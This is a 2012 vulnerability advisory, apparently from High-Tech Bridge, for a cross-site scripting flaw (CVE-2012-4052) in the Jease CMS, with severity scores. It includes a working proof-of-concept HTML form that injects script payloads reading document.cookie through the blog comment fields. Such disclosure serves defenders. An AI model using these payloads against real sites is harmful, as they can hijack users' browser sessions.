Lucene search

K
htbridgeHigh-Tech BridgeHTB23104
HistoryJul 25, 2012 - 12:00 a.m.

Cross-Site Scripting (XSS) in Jease

2012-07-2500:00:00
High-Tech Bridge
www.htbridge.com
19

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.002 Low

EPSS

Percentile

56.9%

High-Tech Bridge Security Research Lab discovered vulnerability in Jease, which can be exploited to perform Cross-Site Scripting (XSS) attacks.

  1. Cross-Site Scripting (XSS) in Jease: CVE-2012-4052
    Input passed via the “author”, “subject” and “comment” POST parameters when creating a new comment is not properly sanitised before being returned to the user.
    This can be exploited to execute arbitrary HTML and script code in user’s browser session in context of an affected website.
    The following PoC (Proof of Concept) demonstrates the vulnerability:
    <form action=“http://[host]:8080/blog/” method=“post” name=“main” id=“main”>
    <input type=“hidden” name=“author-467844289” value=‘"><script>alert(document.cookie);</script>’>
    <input type=“hidden” name=“subject-467844289” value=‘"><script>alert(document.cookie);</script>’>
    <input type=“hidden” name=“comment-467844289” value=‘"></textarea><script>alert(document.cookie);</script>’>
    <input type=“submit” name=“Submit” value=“Send”>
    </form>
CPENameOperatorVersion
jeasele2.8

4.3 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

0.002 Low

EPSS

Percentile

56.9%

Related for HTB23104